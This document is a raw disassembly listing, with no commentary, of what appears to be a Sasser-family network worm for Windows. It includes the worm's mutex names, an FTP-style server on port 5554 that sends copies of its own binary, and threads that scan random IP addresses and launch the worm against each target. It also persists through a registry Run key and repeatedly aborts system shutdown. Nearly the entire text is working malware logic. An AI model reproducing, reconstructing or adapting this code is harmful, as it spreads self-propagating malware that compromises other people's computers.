pop ecx
test eax, eax
pop ecx
jz short loc_401BC8
push 0
push off_4068D8
call sub_402210
pop ecx
push eax
push off_4068D8
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401BC8: ; CODE XREF: StartAddress+A4�j
lea eax, [ebp+buf]
push offset aPort ; "PORT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401CA4
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402720
mov ax, word_406A60
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402680
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C17: ; CODE XREF: StartAddress+159�j
test ebx, ebx
jz short loc_401C4B
cmp edi, 4
jge short loc_401C2E
push ebx
call sub_401E30
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C2E: ; CODE XREF: StartAddress+116�j
jnz short loc_401C3A
push ebx
call sub_401E30
pop ecx
mov [ebp+var_18], eax
loc_401C3A: ; CODE XREF: StartAddress:loc_401C2E�j
cmp edi, 5
jnz short loc_401C4E
push ebx
call sub_401E30
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C4E
; ---------------------------------------------------------------------------
loc_401C4B: ; CODE XREF: StartAddress+111�j
push 6
pop edi
loc_401C4E: ; CODE XREF: StartAddress+135�j
; StartAddress+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402680
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C17
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax ; LPSTR
call wsprintfA ; wsprintfA
add esp, 18h
push 0
push off_4068E0
call sub_402210
pop ecx
push eax
push off_4068E0
jmp loc_401DD7
; ---------------------------------------------------------------------------
loc_401CA4: ; CODE XREF: StartAddress+D5�j
lea eax, [ebp+buf]
push offset aRetr ; "RETR"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401DDC
push 0 ; flags
push off_4068E4
call sub_402210
pop ecx
push eax ; len
push off_4068E4 ; buf
push ebx ; s
call esi ; send
lea eax, [ebp+var_60]
push eax ; name
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DB9
push 10h
lea eax, [ebp+name]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push edi ; hostshort
call htons ; htons
push 0 ; protocol
push 1 ; type
push 2 ; af
mov word ptr [ebp+name.sa_data], ax
mov dword ptr [ebp+name.sa_data+2], ebx
call socket ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+s], ebx
jz loc_401DB9
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push ebx ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401D44
push ebx ; s
call closesocket ; closesocket
jmp short loc_401DB9
; ---------------------------------------------------------------------------
loc_401D44: ; CODE XREF: StartAddress+231�j
lea eax, [ebp+PathName]
push 400h ; nSize
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
lea eax, [ebp+PathName]
push 0 ; iReadWrite
push eax ; lpPathName
call _lopen ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+hFile], eax
jz short loc_401DB9
lea eax, [ebp+Buffer]
push offset byte_406F38
push eax
call sub_402720
mov ebx, _hread
pop ecx
pop ecx
lea eax, [ebp+Buffer]
push 1 ; lBytes
push eax ; lpBuffer
push [ebp+hFile] ; hFile
loc_401D8E: ; CODE XREF: StartAddress+2A6�j
call ebx ; _hread
cmp eax, 1
jnz short loc_401DB0
and [ebp+var_1], 0
push 0 ; flags
push eax ; len
lea eax, [ebp+Buffer]
push eax ; buf
push [ebp+s] ; s
call esi ; send
lea eax, [ebp+Buffer]
push 1
push eax
push [ebp+hFile]
jmp short loc_401D8E
; ---------------------------------------------------------------------------
loc_401DB0: ; CODE XREF: StartAddress+28B�j
push [ebp+hFile] ; hFile
call _lclose ; _lclose
loc_401DB9: ; CODE XREF: StartAddress+1DD�j
; StartAddress+21B�j ...
push [ebp+s] ; s
call closesocket ; closesocket
push 0
push off_4068DC
call sub_402210
pop ecx
push eax
push off_4068DC
loc_401DD7: ; CODE XREF: StartAddress+197�j
push [ebp+hostshort]
jmp short loc_401E12
; ---------------------------------------------------------------------------
loc_401DDC: ; CODE XREF: StartAddress+1B1�j
lea eax, [ebp+buf]
push offset aQuit ; "QUIT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401DFC
push ebx ; s
call closesocket ; closesocket
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401DFC: ; CODE XREF: StartAddress+2E9�j
push 0 ; flags
push off_4068DC
call sub_402210
pop ecx
push eax ; len
push off_4068DC ; buf
loc_401E11: ; CODE XREF: StartAddress+8A�j
; StartAddress+BB�j
push ebx ; s
loc_401E12: ; CODE XREF: StartAddress+2D2�j
call esi ; send
loc_401E14: ; CODE XREF: StartAddress+2F2�j
cmp [ebp+var_10], 0
jg loc_401B43
push [ebp+hostshort] ; s
call closesocket ; closesocket
pop edi
pop esi
loc_401E29: ; CODE XREF: StartAddress+10�j
xor eax, eax
pop ebx
leave
retn 4
StartAddress endp
; =============== S U B R O U T I N E =======================================
sub_401E30 proc near ; CODE XREF: StartAddress+119�p
; StartAddress+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E38: ; CODE XREF: sub_401E30+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E42
cmp al, 9
jnz short loc_401E45
loc_401E42: ; CODE XREF: sub_401E30+C�j
inc esi
jmp short loc_401E38
; ---------------------------------------------------------------------------
loc_401E45: ; CODE XREF: sub_401E30+10�j
; sub_401E30+2E�j
movsx eax, byte ptr [esi]
push eax ; CharType
call sub_402810
test eax, eax
pop ecx
jz short loc_401E60
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E45
; ---------------------------------------------------------------------------
loc_401E60: ; CODE XREF: sub_401E30+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_401E65(LPVOID)
sub_401E65 proc near ; DATA XREF: sub_402029+79�o
name = sockaddr ptr -14h
ThreadId = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi ; protocol
push 1 ; type
push 2 ; af
call socket ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401E89
loc_401E81: ; CODE XREF: sub_401E65+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401E89: ; CODE XREF: sub_401E65+1A�j
push 15B2h ; hostshort
mov [ebp+name.sa_family], 2
call htons ; htons
mov word ptr [ebp+name.sa_data], ax
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push edi ; s
mov dword ptr [ebp+name.sa_data+2], esi
call bind ; bind
cmp eax, 0FFFFFFFFh
jz short loc_401EC1
push 5 ; backlog
push edi ; s
call listen ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_401ECA
loc_401EC1: ; CODE XREF: sub_401E65+4C�j
push edi ; s
call closesocket ; closesocket
jmp short loc_401E81
; ---------------------------------------------------------------------------
loc_401ECA: ; CODE XREF: sub_401E65+5A�j
; sub_401E65+89�j
push esi ; addrlen
push esi ; addr
push edi ; s
call accept ; accept
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push esi ; dwCreationFlags
push eax ; lpParameter
push offset StartAddress ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call CreateThread ; CreateThread
push 19h ; dwMilliseconds
call Sleep ; Sleep
jmp short loc_401ECA
sub_401E65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_401EF0(LPVOID)
sub_401EF0 proc near ; DATA XREF: sub_402029+8D�o
var_454 = byte ptr -454h
cp = byte ptr -438h
CmdLine = byte ptr -400h
sub esp, 454h
push ebx
push ebp
mov ebp, wsprintfA
push esi
push edi
mov esi, 0FFh
loc_401F05: ; CODE XREF: sub_401EF0+134�j
lea eax, [esp+464h+cp]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+464h+cp]
push eax ; cp
call inet_addr ; inet_addr
movsx edi, al
test edi, edi
movsx ebx, ah
jge short loc_401F2B
add edi, 100h
loc_401F2B: ; CODE XREF: sub_401EF0+33�j
test ebx, ebx
jge short loc_401F35
add ebx, 100h
loc_401F35: ; CODE XREF: sub_401EF0+3D�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F92
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F78
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401F8F
; ---------------------------------------------------------------------------
loc_401F78: ; CODE XREF: sub_401EF0+63�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push ebx
loc_401F8F: ; CODE XREF: sub_401EF0+86�j
push edi
jmp short loc_401FBE
; ---------------------------------------------------------------------------
loc_401F92: ; CODE XREF: sub_401EF0+53�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_401FBE: ; CODE XREF: sub_401EF0+A0�j
lea eax, [esp+474h+var_454]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax ; LPSTR
call ebp ; wsprintfA
add esp, 18h
lea eax, [esp+464h+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40201C
lea eax, [esp+464h+CmdLine]
push 400h ; nSize
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
lea eax, [esp+464h+CmdLine]
push offset asc_406A7C ; " "
push eax
call sub_402730
lea eax, [esp+46Ch+var_454]
push eax
lea eax, [esp+470h+CmdLine]
push eax
call sub_402730
add esp, 10h
lea eax, [esp+464h+CmdLine]
push 0 ; uCmdShow
push eax ; lpCmdLine
call WinExec ; WinExec
loc_40201C: ; CODE XREF: sub_401EF0+EA�j
push 19h ; dwMilliseconds
call Sleep ; Sleep
jmp loc_401F05
sub_401EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_402029(int, int, DWORD s, int)
sub_402029 proc near ; CODE XREF: .text:00402907�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
ThreadId = dword ptr -4
s = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, CreateMutexA
xor esi, esi
push offset Name ; "Jobaka3"
push esi ; bInitialOwner
push esi ; lpMutexAttributes
call edi ; CreateMutexA
call GetTickCount ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+s]
call sub_402210
pop ecx
test eax, eax
pop ecx
jbe short loc_402072
push [ebp+s] ; s
call sub_401A84
pop ecx
push 1
pop eax
loc_40206C: ; CODE XREF: sub_402029+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402072: ; CODE XREF: sub_402029+35�j
push 1 ; lpName
call sub_4020D7
mov [esp+14h+var_14], offset aJumpallsnlstil ; "JumpallsNlsTillt"
push esi ; bInitialOwner
push esi ; lpMutexAttributes
call edi ; CreateMutexA
call GetLastError
cmp eax, 0B7h
jnz short loc_402095
xor eax, eax
jmp short loc_40206C
; ---------------------------------------------------------------------------
loc_402095: ; CODE XREF: sub_402029+66�j
mov edi, CreateThread
lea eax, [ebp+ThreadId]
push ebx
push eax ; lpThreadId
push esi ; dwCreationFlags
push esi ; lpParameter
push offset sub_401E65 ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call edi ; CreateThread
mov ebx, 400h
loc_4020B0: ; CODE XREF: sub_402029+97�j
lea eax, [ebp+var_8]
push eax ; lpThreadId
push esi ; dwCreationFlags
push esi ; lpParameter
push offset sub_401EF0 ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call edi ; CreateThread
dec ebx
jnz short loc_4020B0
pop ebx
loc_4020C3: ; CODE XREF: sub_402029+AC�j
push esi ; lpMachineName
call AbortSystemShutdownA ; AbortSystemShutdownA
push 0BB8h ; dwMilliseconds
call Sleep ; Sleep
jmp short loc_4020C3
sub_402029 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020D7 proc near ; CODE XREF: sub_402029+4B�p
ExistingFileName= byte ptr -824h
var_425 = byte ptr -425h
NewFileName = byte ptr -424h
hKey = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+ExistingFileName]
push esi ; nSize
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
lea eax, [ebp+NewFileName]
push esi ; uSize
push eax ; lpBuffer
call GetWindowsDirectoryA ; GetWindowsDirectoryA
lea eax, [ebp+NewFileName]
push eax
call sub_402210
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_40212F
lea eax, [ebp+NewFileName]
push offset asc_406ACC ; "\\"
push eax
call sub_402730
pop ecx
pop ecx
loc_40212F: ; CODE XREF: sub_4020D7+43�j
push lpValueName
lea eax, [ebp+NewFileName]
push eax
call sub_402730
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_40215F
lea eax, [ebp+NewFileName]
push 0 ; bFailIfExists
push eax ; lpNewFileName
lea eax, [ebp+ExistingFileName]
push eax ; lpExistingFileName
call CopyFileA ; CopyFileA
loc_40215F: ; CODE XREF: sub_4020D7+70�j
lea eax, [ebp+hKey]
push eax ; phkResult
push offset SubKey ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h ; hKey
call RegOpenKeyA ; RegOpenKeyA
lea eax, [ebp+NewFileName]
push eax
call sub_402210
pop ecx
push eax ; cbData
lea eax, [ebp+NewFileName]
push eax ; lpData
push 1 ; dwType
push 0 ; Reserved
push lpValueName ; lpValueName
push [ebp+hKey] ; hKey
call RegSetValueExA ; RegSetValueExA
push [ebp+hKey] ; hKey
call RegCloseKey ; RegCloseKey
leave
retn
sub_4020D7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4021B0 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_402203
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4021F7
neg ecx
and ecx, 3
jz short loc_4021D9
sub edx, ecx
loc_4021D3: ; CODE XREF: sub_4021B0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4021D3
loc_4021D9: ; CODE XREF: sub_4021B0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4021F7
rep stosd
test edx, edx
jz short loc_4021FD
loc_4021F7: ; CODE XREF: sub_4021B0+18�j
; sub_4021B0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4021F7
loc_4021FD: ; CODE XREF: sub_4021B0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402203: ; CODE XREF: sub_4021B0+A�j
mov eax, [esp+arg_0]
retn
sub_4021B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402210 proc near ; CODE XREF: sub_401210+3E�p
; sub_401210+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_402230
loc_40221C: ; CODE XREF: sub_402210+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402263
test ecx, 3
jnz short loc_40221C
add eax, 0
loc_402230: ; CODE XREF: sub_402210+A�j
; sub_402210+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402230
mov eax, [ecx-4]
test al, al
jz short loc_402281
test ah, ah
jz short loc_402277
test eax, 0FF0000h
jz short loc_40226D
test eax, 0FF000000h
jz short loc_402263
jmp short loc_402230
; ---------------------------------------------------------------------------
loc_402263: ; CODE XREF: sub_402210+11�j
; sub_402210+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40226D: ; CODE XREF: sub_402210+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402277: ; CODE XREF: sub_402210+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402281: ; CODE XREF: sub_402210+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_402210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402290 proc near ; CODE XREF: sub_401398+59�p
; sub_401398+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4022B0
cmp edi, eax
jb loc_402428
loc_4022B0: ; CODE XREF: sub_402290+16�j
test edi, 3
jnz short loc_4022CC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
loc_4022CC: ; CODE XREF: sub_402290+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4022E4
and eax, 3
add ecx, eax
jmp dword ptr loc_4022EC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4022E4: ; CODE XREF: sub_402290+46�j
jmp dword ptr loc_4023E8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4022EC: ; CODE XREF: sub_402290+31�j
; sub_402290+8E�j ...
jmp off_40236C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_402300
dd offset loc_40232C
; ---------------------------------------------------------------------------
push eax
and eax, [eax+0]
loc_402300: ; DATA XREF: sub_402290+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40232C: ; DATA XREF: sub_402290+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40236C dd offset loc_4023CF ; DATA XREF: sub_402290:loc_4022EC�r
dd offset loc_4023BC
dd offset loc_4023B4
dd offset loc_4023AC
dd offset loc_4023A4
dd offset loc_40239C
dd offset loc_402394
dd offset loc_40238C
; ---------------------------------------------------------------------------
loc_40238C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402394: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40239C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4023A4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4023AC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4023B4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4023BC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4023CF: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290:off_40236C�o
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4023D8 dd offset loc_4023E8 ; DATA XREF: sub_402290+35�r
; sub_402290+92�r ...
dd offset loc_4023F0
dd offset loc_4023FC
dd offset loc_402410
; ---------------------------------------------------------------------------
loc_4023E8: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4023F0: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4023FC: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402410: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402428: ; CODE XREF: sub_402290+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40245C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402450: ; CODE XREF: sub_402290+1B1�j
; sub_402290+208�j ...
neg ecx
jmp off_402520[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40245C: ; CODE XREF: sub_402290+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402474
and eax, 3
sub ecx, eax
jmp dword ptr loc_402474+4[eax*4]
; ---------------------------------------------------------------------------
loc_402474: ; CODE XREF: sub_402290+1D6�j
; DATA XREF: sub_402290+1DD�r
jmp off_402570[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov [eax+eax*2], ah
add [eax-2FFFBFDCh], ch
and al, 40h
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_402450
std
rep movsd
cld
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402524
dd offset loc_40252C
dd offset loc_402534
dd offset loc_40253C
dd offset loc_402544
dd offset loc_40254C
dd offset loc_402554
off_402520 dd offset loc_402567 ; DATA XREF: sub_402290+1C2�r
; ---------------------------------------------------------------------------
loc_402524: ; DATA XREF: sub_402290+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40252C: ; DATA XREF: sub_402290+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_402534: ; DATA XREF: sub_402290+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40253C: ; DATA XREF: sub_402290+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_402544: ; DATA XREF: sub_402290+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40254C: ; DATA XREF: sub_402290+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_402554: ; DATA XREF: sub_402290+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402567: ; CODE XREF: sub_402290+1C2�j
; DATA XREF: sub_402290:off_402520�o
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402570 dd offset loc_402580 ; DATA XREF: sub_402290+1B7�r
; sub_402290:loc_402474�r ...
dd offset loc_402588
dd offset loc_402598
dd offset loc_4025AC
; ---------------------------------------------------------------------------
loc_402580: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402588: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402598: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4025AC: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4025D0 proc near ; CODE XREF: sub_40159E+8�p
; sub_40371C+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4025F0
loc_4025DC: ; CODE XREF: sub_4025D0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4025DC
loc_4025F0: ; CODE XREF: sub_4025D0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4025D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402600 proc near ; CODE XREF: sub_401A84+2D�p
; sub_401A84+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40267A
mov dh, [ecx+1]
test dh, dh
jz short loc_402667
loc_402618: ; CODE XREF: sub_402600+52�j
; sub_402600+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_40263A
test al, al
jz short loc_402634
loc_402629: ; CODE XREF: sub_402600+32�j
mov al, [esi]
inc esi
loc_40262C: ; CODE XREF: sub_402600+3F�j
cmp al, dl
jz short loc_40263A
test al, al
jnz short loc_402629
loc_402634: ; CODE XREF: sub_402600+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40263A: ; CODE XREF: sub_402600+23�j
; sub_402600+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_40262C
lea edi, [esi-1]
loc_402644: ; CODE XREF: sub_402600+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402673
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_402618
mov al, [ecx+3]
test al, al
jz short loc_402673
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_402644
jmp short loc_402618
; ---------------------------------------------------------------------------
loc_402667: ; CODE XREF: sub_402600+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402996
; ---------------------------------------------------------------------------
loc_402673: ; CODE XREF: sub_402600+49�j
; sub_402600+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
